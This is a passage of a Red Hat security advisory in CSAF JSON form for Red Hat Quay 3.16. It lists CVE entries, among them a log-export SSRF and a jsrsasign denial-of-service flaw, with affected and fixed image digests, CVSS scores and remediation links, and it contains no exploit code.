          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "RHBZ#2439201",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439201"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-2377",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2377"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2377"
        }
      ],
      "release_date": "2026-04-08T16:18:10.324000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "mirror-registry: quay: quay: Server-Side Request Forgery via log export functionality"
    },
    {
      "cve": "CVE-2026-4427",
      "discovery_date": "2026-03-18T14:02:19.414820+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "No description is available for this CVE.",
          "title": "Vulnerability description"
        },
        {
          "category": "other",
          "text": "This CVE has been marked as Rejected by the assigning CNA.",
          "title": "Statement"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4427"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4427",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4427"
        }
      ],
      "release_date": "2026-03-18T13:00:31+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "title": "github.com/jackc/pgproto3: pgproto3: Denial of Service via negative field length in DataRow message"
    },
    {
      "cve": "CVE-2026-4598",
      "cwe": {
        "id": "CWE-1287",
        "name": "Improper Validation of Specified Type of Input"
      },
      "discovery_date": "2026-03-23T06:01:47.891452+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2450210"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in jsrsasign. A remote attacker could exploit this vulnerability by providing specially crafted zero or negative inputs to the bnModInverse function within the BigInteger.modInverse implementation. This could lead to an infinite loop, causing a permanent denial of service (DoS) by hanging the process.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "jsrsasign: jsrsasign: Denial of Service via infinite loop in bnModInverse function with crafted inputs",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "IMPORTANT: A denial of service flaw was found in jsrsasign. This vulnerability allows a remote attacker to cause a permanent denial of service by providing specially crafted zero or negative inputs to the bnModInverse function, leading to an infinite loop. This affects Red Hat Migration Toolkit for Virtualization and Red Hat Quay, which utilize the vulnerable jsrsasign component.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4598"
        },
        {
          "category": "external",
          "summary": "RHBZ#2450210",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450210"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4598",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4598"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4598",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4598"
        },
        {
          "category": "external",
          "summary": "https://gist.github.com/Kr0emer/a1bf5cd4547cc630d2dcc5e761de8264",
          "url": "https://gist.github.com/Kr0emer/a1bf5cd4547cc630d2dcc5e761de8264"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/commit/ca5b027240287a1e71fe63019fc4400332594323",
          "url": "https://github.com/kjur/jsrsasign/commit/ca5b027240287a1e71fe63019fc4400332594323"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/pull/648",
          "url": "https://github.com/kjur/jsrsasign/pull/648"
        },
        {
          "category": "external",
          "summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370938",
          "url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370938"
        }
      ],
      "release_date": "2026-03-23T05:00:11.571000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
